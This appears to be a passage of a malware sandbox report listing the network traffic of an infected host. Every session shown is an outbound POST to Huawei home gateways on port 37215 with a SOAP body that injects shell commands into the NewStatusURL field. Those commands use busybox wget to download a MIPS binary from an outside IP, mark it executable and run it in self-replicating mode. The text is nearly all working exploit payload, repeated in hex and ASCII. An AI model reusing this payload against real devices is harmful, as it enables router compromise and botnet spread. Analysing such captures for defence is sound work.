                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2623192.168.2.2348172195.109.171.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628921986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2624192.168.2.2351198110.14.147.7937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628926039 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2625192.168.2.2335088197.127.200.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628931999 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2626192.168.2.234960041.227.144.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628947973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2627192.168.2.2358038197.138.81.10837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628950119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2628192.168.2.2336576187.221.110.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628950119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2629192.168.2.2338100133.94.131.6637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628952026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2630192.168.2.2355770197.69.107.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628961086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2631192.168.2.2335014187.166.158.8637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628963947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2632192.168.2.2353930209.69.47.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628982067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
